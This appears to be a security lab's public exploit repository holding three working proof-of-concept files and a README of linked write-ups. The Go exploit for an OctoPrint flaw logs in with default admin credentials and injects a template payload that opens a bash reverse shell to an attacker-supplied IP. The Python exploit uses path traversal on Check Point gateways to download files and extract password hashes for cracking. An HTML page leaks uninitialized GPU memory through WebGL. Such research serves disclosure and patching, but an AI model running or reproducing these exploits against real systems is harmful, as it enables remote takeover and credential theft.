package main

import (
	"crypto/tls"
	"fmt"
	"log"
	"net/http"
	"net/url"
	"os"
	"strings"
	"sync"
)

var (
	PROXYURL = ""
)

const CSRFTOKEN = "ImU4ZmY1NDhlZTU1ZGI5M2I2MjA3YmZhYjAxY2QzOWQxOTRiN2Q0YTgi.ZUn0tg.OEMZhA3pw-YZTkm7INGV0FBBjZg"

func getLoginCookie(uri string) string {
	uri += "/api/login"
	proxy, _ := url.Parse(PROXYURL)
	tr := &http.Transport{
		Proxy:           http.ProxyURL(proxy),
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}
	client := &http.Client{
		Transport: tr,
	}

	data := `{"user":"admin","pass":"admin","remember":false}`

	req, err := http.NewRequest("POST", uri, strings.NewReader(data))

	if err != nil {
		log.Println("Error creating request:", err)
	}

	req.Header.Set("Content-Type", "application/json; charset=UTF-8")
	//req.Header.Set("X-CSRF-Token", CSRFTOKEN)
	//req.Header.Set("Cookie", "csrf_token_P5000="+CSRFTOKEN)

	resp, err := client.Do(req)

	if err != nil {
		log.Println("Error making request:", err)
	}

	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		log.Printf("HTTP request failed with status code: %d\n", resp.StatusCode)
	}

	cookies := resp.Cookies()
	if len(cookies) == 0 {
		log.Println("No cookies found in the response.")
	}

	cookieStr := ""

	for _, cookie := range cookies {
		if cookie.Name == "session_P5000" {
			cookieStr = "csrf_token_P5000= " + CSRFTOKEN + ";" + cookie.Name + "=" + cookie.Value
		}
		//log.Printf("Name: %s, Value: %s\n", cookie.Name, cookie.Value)
	}

	return cookieStr
}

func setRequest(uri string, cookie string, payload string, types int, wg *sync.WaitGroup) {
	defer wg.Done()
	if types == 0 {
		uri += "/api/settings"
	} else if types == 1 {
		uri += "/api/connection"
	}

	proxy, _ := url.Parse(PROXYURL)
	tr := &http.Transport{
		Proxy:           http.ProxyURL(proxy),
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}
	client := &http.Client{
		Transport: tr,
	}

	req, err := http.NewRequest("POST", uri, strings.NewReader(payload))

	if err != nil {
		log.Println("Error creating request:", err)
	}

	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("X-CSRF-Token", CSRFTOKEN)
	req.Header.Set("Cookie", cookie)

	_, err = client.Do(req)

	if err != nil {
		log.Println("Error making request:", err)
	}

	//defer resp.Body.Close()

	//log.Println(resp.StatusCode)
}

func main() {

	if len(os.Args) <= 4 {
		fmt.Println("Usage: ./CVE-2023-41047 <target> <proxyUrl> <reverse IP> <reverse PORT>")
		return
	}

	uri := os.Args[1]
	PROXYURL = os.Args[2]
	reverseIP := os.Args[3]
	reversePort := os.Args[4]

	cookie := getLoginCookie(uri)

	var wg sync.WaitGroup
	wg.Add(1)

	log.Println("[*] Start...")
	// Turn on virtual printer
	payload := `{"plugins":{"virtual_printer":{"enabled":true}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}`
	go setRequest(uri, cookie, payload, 0, &wg)
	log.Println("[+] Step 1 finish...")
	// Set evil gcode
	payload = `{"scripts":{"gcode":{"afterPrinterConnected":"{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('bash -c \\\"bash -i  >&/dev/tcp/` + reverseIP + `/` + reversePort + ` 0>&1\\\"').read()\") }} {% endif %} {% endfor %}"}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}`
	go setRequest(uri, cookie, payload, 0, &wg)
	log.Println("[+] Step 2 finish...")

	payload = `{"port":"AUTO","baudrate":0,"printerProfile":"_default","autoconnect":false,"command":"connect"}`
	go setRequest(uri, cookie, payload, 1, &wg)
	log.Printf("[+] Step 3 reverse: tcp://%s:%s", reverseIP, reversePort)
	payload = `{"command":"disconnect"}`
	go setRequest(uri, cookie, payload, 1, &wg)

	wg.Wait()
}


================================================
FILE: CVE-2024-24919/exp.py
================================================

import argparse
import requests
from urllib3.exceptions import InsecureRequestWarning
import re
import argparse


requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


def parse_bin_data(bin_data):

    internal_password_pattern = re.compile(rb":internal_passw.{3}ord \(([^)]+)\)", re.DOTALL)
    internal_password_matches = list(internal_password_pattern.finditer(bin_data))
    results = []

    for match in internal_password_matches:
        internal_password = match.group(1).decode('utf-8', errors='ignore').strip()

        if internal_password:
            preceding_text = bin_data[:match.start()]
            name_pattern = re.compile(rb":name \(([^)]+)\)", re.DOTALL)
            name_matches = list(name_pattern.finditer(preceding_text))

            if name_matches:
                name = name_matches[-1].group(1).decode('utf-8', errors='ignore').strip()

                results.append({
                    'name': name,
                    'internal_password': internal_password
                })
    return results

def fget(url,filename):

    session = requests.Session()

    rawBody = "/CSHELL/../../../../../../../{}".format(filename)
    headers = {"Sec-Ch-Ua":"\"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"","Accept":"*/*","Sec-Ch-Ua-Platform":"\"macOS\"","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36","Referer":"https://192.168.161.110/sslvpnc/Portal/Main","Connection":"keep-alive","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"script","Accept-Encoding":"gzip, deflate, br","Accept-Language":"zh-CN,zh;q=0.9","Sec-Ch-Ua-Mobile":"?0","Sec-Fetch-Mode":"no-cors"}
    response = session.get("{}/clients/MyCRL".format(url), data=rawBody, headers=headers,verify=False)

    s_filename = filename.split("/")[-1]
    if int(response.status_code)==200:
        print('[+] The vulnerability exists, and the file will be saved locally.')
        with open(s_filename, 'wb') as file:
            file.write(response.content)
        if "fwauth.NDB" in filename:
            result = parse_bin_data(response.content)

            print("[!] You can use hashcat for brute-forcing.")
            print("[!] The type of hash is DES(Unix).")
            for entry in result:
                print("[+] " + f"Username: {entry['name']}, Password_Hash: {entry['internal_password']}")
    else:
        print('[!] The target is inappropriate.')
        exit()

parser = argparse.ArgumentParser()

parser.add_argument(dest = "url")
parser.add_argument(dest = "filename")

args = parser.parse_args()


fget(args.url,args.filename)


================================================
FILE: CVE-2026-5283/poc.html
================================================
<!DOCTYPE html>
<html><head><title>CVE-2026-5283: GPU Address Leak</title>
<style>
body{font-family:monospace;background:#111;color:#ddd;margin:20px}
canvas{border:1px solid #555;margin:3px}
pre{background:#0a0a0a;padding:10px;max-height:600px;overflow:auto;font-size:11px}
.red{color:#f44;font-weight:bold}.grn{color:#4f4}.yel{color:#ff0}.cyan{color:#0ff}
</style>
</head>
<body>
<h3>CVE-2026-5283: GPU Internal Address Leak</h3>
<div id="canvases"></div>
<pre id="log"></pre>
<script>
const L=s=>{const e=document.getElementById('log');e.innerHTML+=s+'\n';e.scrollTop=e.scrollHeight};
const gl=document.createElement('canvas').getContext('webgl2');
if(!gl){L('No WebGL2');throw'x'}
const dbg=gl.getExtension('WEBGL_debug_renderer_info');
L('Renderer: '+(dbg?gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL):gl.getParameter(gl.RENDERER)));

const SIZE=512, LAYERS=8, CLEAR_LAYER=3;

/*
 * Strategy: GPU driver stores internal metadata (texture descriptors,
 * buffer descriptors, sampler states, render target info) in the same
 * GPU heap as texture data. These contain GPU virtual addresses.
 *
 * Phase 1: Create LOTS of GPU objects to generate internal metadata
 * Phase 2: Delete everything → metadata memory freed to GPU heap
 * Phase 3: Allocate array texture → reuses freed metadata memory
 * Phase 4: Trigger CVE-2026-5283 → read uninitialized layers
 * Phase 5: Scan leaked data for address-like patterns
 */

/* ---- Phase 1: Create many GPU objects to spray internal metadata ---- */
L('\n[Phase 1] Creating GPU objects to spray driver metadata...');

const textures=[], fbos=[], rbs=[], bufs=[], samplers=[], vaos=[];

/* Many textures with various formats → texture descriptors contain base_addr */
for(let i=0;i<100;i++){
    const t=gl.createTexture();
    gl.bindTexture(gl.TEXTURE_2D,t);
    const sz=[64,128,256,512][i%4];
    const fmt=[gl.RGBA8,gl.RGBA16F,gl.RGB8,gl.RG8][i%4];
    const tp=[gl.UNSIGNED_BYTE,gl.HALF_FLOAT,gl.UNSIGNED_BYTE,gl.UNSIGNED_BYTE][i%4];
    const bf=[gl.RGBA,gl.RGBA,gl.RGB,gl.RG][i%4];
    gl.texImage2D(gl.TEXTURE_2D,0,fmt,sz,sz,0,bf,tp,null);
    gl.texParameteri(gl.TEXTURE_2D,gl.TEXTURE_MIN_FILTER,gl.LINEAR_MIPMAP_LINEAR);
    gl.generateMipmap(gl.TEXTURE_2D);
    textures.push(t);
}
L('  100 textures with mipmaps');

/* FBOs with attachments → render target descriptors */
for(let i=0;i<50;i++){
    const f=gl.createFramebuffer();
    gl.bindFramebuffer(gl.FRAMEBUFFER,f);
    if(textures[i])
        gl.framebufferTexture2D(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,gl.TEXTURE_2D,textures[i],0);
    gl.bindFramebuffer(gl.FRAMEBUFFER,null);
    fbos.push(f);
}
L('  50 FBOs');

/* Renderbuffers → internal storage descriptors */
for(let i=0;i<50;i++){
    const r=gl.createRenderbuffer();
    gl.bindRenderbuffer(gl.RENDERBUFFER,r);
    gl.renderbufferStorage(gl.RENDERBUFFER,[gl.RGBA8,gl.DEPTH24_STENCIL8,gl.DEPTH_COMPONENT16][i%3],[64,128,256][i%3],[64,128,256][i%3]);
    rbs.push(r);
}
L('  50 renderbuffers');

/* Buffers with data → buffer descriptors contain GPU addresses */
for(let i=0;i<100;i++){
    const b=gl.createBuffer();
    gl.bindBuffer(gl.ARRAY_BUFFER,b);
    gl.bufferData(gl.ARRAY_BUFFER,[256,1024,4096,16384][i%4],gl.DYNAMIC_DRAW);
    bufs.push(b);
}
L('  100 buffers');

/* Samplers → sampler state objects */
for(let i=0;i<30;i++){
    const s=gl.createSampler();
    gl.samplerParameteri(s,gl.TEXTURE_MIN_FILTER,[gl.NEAREST,gl.LINEAR,gl.LINEAR_MIPMAP_LINEAR][i%3]);
    gl.samplerParameteri(s,gl.TEXTURE_WRAP_S,[gl.REPEAT,gl.CLAMP_TO_EDGE,gl.MIRRORED_REPEAT][i%3]);
    gl.bindSampler(i%4,s);
    samplers.push(s);
}
L('  30 samplers');

/* VAOs → vertex attrib state */
for(let i=0;i<30;i++){
    const v=gl.createVertexArray();
    gl.bindVertexArray(v);
    if(bufs[i]){
        gl.bindBuffer(gl.ARRAY_BUFFER,bufs[i]);
        gl.vertexAttribPointer(0,4,gl.FLOAT,false,0,0);
        gl.enableVertexAttribArray(0);
    }
    vaos.push(v);
}
gl.bindVertexArray(null);
L('  30 VAOs');

/* Force GPU to process all object creation */
gl.finish();

/* Also render into some FBOs to generate render target metadata */
for(let i=0;i<20;i++){
    gl.bindFramebuffer(gl.FRAMEBUFFER,fbos[i]);
    if(gl.checkFramebufferStatus(gl.FRAMEBUFFER)===gl.FRAMEBUFFER_COMPLETE){
        gl.viewport(0,0,64,64);
        gl.clearColor(Math.random(),Math.random(),Math.random(),1);
        gl.clear(gl.COLOR_BUFFER_BIT);
    }
}
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
gl.viewport(0,0,SIZE,SIZE);
gl.finish();
L('  Rendered to 20 FBOs');

/* ---- Phase 2: Delete EVERYTHING to free metadata back to GPU heap ---- */
L('\n[Phase 2] Deleting all objects → driver metadata freed to GPU heap...');

for(const v of vaos) gl.deleteVertexArray(v);
for(const s of samplers){gl.deleteSampler(s);}
for(const f of fbos) gl.deleteFramebuffer(f);
for(const r of rbs) gl.deleteRenderbuffer(r);
for(const b of bufs) gl.deleteBuffer(b);
for(const t of textures) gl.deleteTexture(t);
gl.finish();
L('  Deleted 100 tex + 50 FBO + 50 RB + 100 buf + 30 sampler + 30 VAO');

/* ---- Phase 3: Allocate array texture → reuse freed metadata memory ---- */
L('\n[Phase 3] Allocating target array texture...');
const tex2=gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D_ARRAY,tex2);
gl.texImage3D(gl.TEXTURE_2D_ARRAY,0,gl.RGBA8,SIZE,SIZE,LAYERS,0,gl.RGBA,gl.UNSIGNED_BYTE,null);

/* ---- Phase 4: Trigger CVE-2026-5283 ---- */
const clearFBO=gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER,clearFBO);
gl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,CLEAR_LAYER);
gl.clearColor(0,1,0,1);
gl.clear(gl.COLOR_BUFFER_BIT);
gl.bindFramebuffer(gl.FRAMEBUFFER,null);
gl.deleteFramebuffer(clearFBO);
L('[Phase 4] Cleared layer '+CLEAR_LAYER+' only → bug triggered');

/* ---- Phase 5: Read + scan for GPU addresses ---- */
L('\n[Phase 5] Scanning leaked data for GPU addresses...');
let totalLeaked=0;
const leakedData=[];

for(let layer=0;layer<LAYERS;layer++){
    const readFBO=gl.createFramebuffer();
    gl.bindFramebuffer(gl.FRAMEBUFFER,readFBO);
    gl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,layer);
    const px=new Uint8Array(SIZE*SIZE*4);
    gl.readPixels(0,0,SIZE,SIZE,gl.RGBA,gl.UNSIGNED_BYTE,px);
    gl.bindFramebuffer(gl.FRAMEBUFFER,null);
    gl.deleteFramebuffer(readFBO);

    let nonzero=0;
    for(let i=0;i<px.length;i++) if(px[i]!==0) nonzero++;

    if(layer===CLEAR_LAYER){L('  Layer '+layer+': CLEARED');continue}
    if(nonzero===0){L('  Layer '+layer+': <span class="grn">zeros</span>');continue}

    totalLeaked+=nonzero;
    leakedData.push({layer,px});
    L('  Layer '+layer+': <span class="red">LEAKED '+nonzero+' bytes</span>');

    const u32=new Uint32Array(px.buffer);

    /* Scan for address-like patterns:
     * GPU virtual addresses on ARM Mali: typically 0x00000000-0x0000FFFF (low) or page-aligned
     * GPU virtual addresses on Adreno: various ranges
     * Look for: page-aligned values, non-zero upper bits, pointer-like patterns */

    /* Pattern 1: Page-aligned values (multiple of 0x1000) */
    let pageAligned=0;const pageAddrs=[];
    for(let j=0;j<u32.length;j++){
        if(u32[j]!==0 && (u32[j]&0xFFF)===0 && u32[j]<0xFFFF0000){
            pageAligned++;
            if(pageAddrs.length<8) pageAddrs.push('0x'+u32[j].toString(16).padStart(8,'0'));
        }
    }
    if(pageAligned>5){
        L('    <span class="cyan">Page-aligned addresses: '+pageAligned+'</span>');
        L('    <span class="cyan">  '+pageAddrs.join(', ')+'</span>');
    }

    /* Pattern 2: Values in typical GPU VA ranges */
    let gpuVA=0;const gpuAddrs=[];
    for(let j=0;j<u32.length;j++){
        const v=u32[j];
        /* Common GPU VA ranges on mobile: 0x10000-0x80000000 */
        if(v>=0x10000 && v<0x80000000 && v!==0x00FF00FF && v!==0xFF00FF00){
            gpuVA++;
            if(gpuAddrs.length<8) gpuAddrs.push('0x'+v.toString(16).padStart(8,'0'));
        }
    }
    if(gpuVA>20){
        L('    <span class="cyan">GPU VA range values: '+gpuVA+'</span>');
        L('    <span class="cyan">  '+gpuAddrs.join(', ')+'</span>');
    }

    /* Pattern 3: Repeating pointer-like pairs (common in descriptor tables) */
    let pairCount=0;const pairs=[];
    for(let j=0;j<u32.length-1;j++){
        const a=u32[j],b=u32[j+1];
        if(a>=0x1000 && a<0x80000000 && b>=0x1000 && b<0x80000000 &&
           Math.abs(a-b)<0x100000 && a!==b){
            pairCount++;
            if(pairs.length<4) pairs.push('(0x'+a.toString(16)+', 0x'+b.toString(16)+')');
        }
    }
    if(pairCount>5){
        L('    <span class="cyan">Address pairs (descriptors?): '+pairCount+'</span>');
        L('    <span class="cyan">  '+pairs.join(', ')+'</span>');
    }

    /* Pattern 4: Non-trivial u32 values (not 0, not 0xFF, not 0xFFFF) */
    const histogram={};
    for(let j=0;j<u32.length;j++){
        const v=u32[j];
        if(v!==0 && v!==0xFF && v!==0xFF00 && v!==0xFF00FF && v!==0x00FF00FF &&
           v!==0xFF00FF00 && v!==0xFFFFFFFF && v!==0xFF000000 && v!==0x00FF0000){
            histogram[v]=(histogram[v]||0)+1;
        }
    }
    const unique=Object.keys(histogram).length;
    if(unique>100){
        L('    <span class="cyan">Unique non-trivial u32: '+unique+' (rich metadata!)</span>');
        /* Show top repeated values — likely descriptor fields */
        const sorted=Object.entries(histogram).sort((a,b)=>b[1]-a[1]).slice(0,5);
        for(const[v,c]of sorted){
            L('    <span class="yel">  0x'+parseInt(v).toString(16).padStart(8,'0')+' × '+c+'</span>');
        }
    }

    /* Entropy */
    const hist=new Array(256).fill(0);
    for(let i=0;i<px.length;i++) hist[px[i]]++;
    let ent=0;
    for(let i=0;i<256;i++){if(hist[i]>0){const p=hist[i]/px.length;ent-=p*Math.log2(p)}}
    L('    Entropy: '+ent.toFixed(2)+' bits'+(ent>4?' <span class="red">(VERY HIGH)</span>':ent>2?' <span class="yel">(moderate)</span>':''));

    /* Hex dump — first 128 bytes as both hex and u32 */
    L('    Raw hex: '+Array.from(px.slice(0,64)).map(b=>b.toString(16).padStart(2,'0')).join(' '));
    const u32_sample=new Uint32Array(px.buffer,0,16);
    L('    As u32: '+Array.from(u32_sample).map(v=>'0x'+v.toString(16).padStart(8,'0')).join(' '));
}

/* Visualize */
const container=document.getElementById('canvases');
for(const{layer,px}of leakedData){
    const c=document.createElement('canvas');c.width=256;c.height=256;
    container.appendChild(c);const ctx=c.getContext('2d');
    const img=ctx.createImageData(256,256);const sc=SIZE/256;
    for(let y=0;y<256;y++)for(let x=0;x<256;x++){
        const si=(Math.floor(y*sc)*SIZE+Math.floor(x*sc))*4,di=(y*256+x)*4;
        img.data[di]=px[si];img.data[di+1]=px[si+1];img.data[di+2]=px[si+2];img.data[di+3]=255;
    }
    ctx.putImageData(img,0,0);ctx.fillStyle='#fff';ctx.font='11px monospace';
    ctx.fillText('Layer '+layer,5,12);
}

L('\n'+'='.repeat(60));
if(totalLeaked>0){
    L('<span class="red">CVE-2026-5283: '+totalLeaked+' bytes leaked from '+leakedData.length+' layers</span>');
    L('Check above for page-aligned addresses, GPU VA ranges, descriptor pairs');
    document.title='LEAK';
}else{
    L('<span class="grn">Not vulnerable</span>');
    document.title='OK';
}
L('GL error: 0x'+gl.getError().toString(16));
gl.deleteTexture(tex2);
</script>
</body>
</html>


================================================
FILE: README.md
================================================
---
## The PoC/Exploit of some interesting vulnerabilities
### Author: Vulnerability Research Team of Numen Cyber Labs
---

1. TCP/IP RCE Vulnerability (CVE-2022–34718) PoC Restoration and Analysis  
https://medium.com/@numencyberlabs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf

2. CVE-2022–36537 Vulnerability Technical Analysis with Exploit  
https://medium.com/@numencyberlabs/cve-2022-36537-vulnerability-technical-analysis-with-exp-667401766746

3. CVE-2021-38003：From Leaking TheHole to Chrome Renderer RCE  
 https://medium.com/numen-cyber-labs/from-leaking-thehole-to-chrome-renderer-rce-183dcb6f3078

4. CVE-2022–42889：Text4Shell Vulnerability Technical Analysis  
 https://medium.com/@numencyberlabs/text4shell-or-act4shell-vulnerability-analysis-a860d141e3e5

5. Zero Day Vulnerability: Chromium v8 js engine issue 1303458 — Use After Free in x64 Instruction Optimization Vulnerability Analysis  
https://medium.com/bugbountywriteup/zero-day-vulnerability-chromium-v8-js-engine-issue-1303458-use-after-free-in-x64-instruction-e874419436a6

6. CVE-2022-3723： based on google's public poc
https://medium.com/@numencyberlabs/use-native-pointer-of-function-to-bypass-the-latest-chrome-v8-sandbox-exp-of-issue1378239-251d9c5b0d14

7. CVE-2023-41047: OctoPrint Remote Code Execution Vulnerability
https://medium.com/@numencyberlabs/octoprint-remote-code-execution-vulnerability-7e36372d6c2b

8. CVE-2024-24919: Check Point Security Gateways_Arbitrary File Read Vulnerability
https://medium.com/@numencyberlabs/cve-2024-24919-check-point-security-gateways-arbitrary-file-read-vulnerability-f33b296be408

9. CVE-2026–5283: Uninitialized GPU Memory Disclosure via Partial Clear in ANGLE (Chrome WebGL)
https://medium.com/@numencyberlabs/cve-2026-5283-uninitialized-gpu-memory-disclosure-via-partial-clear-in-angle-chrome-webgl-3740ca481149
---
## The Analysis of Web3-related vulnerabilities
### Discovered by Numen Web3 security products
### Author: Web3 Security Team of Numen Cyber Labs
---

1. Analysis of the First Critical Vulnerability of Aptos Move VM  
https://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e

2. The Story of a High-Risk Vulnerability in Move Reference Safety Verify Module  
https://medium.com/numen-cyber-labs/the-story-of-a-high-vulnerability-in-move-reference-safety-verify-module-2340f3d8c642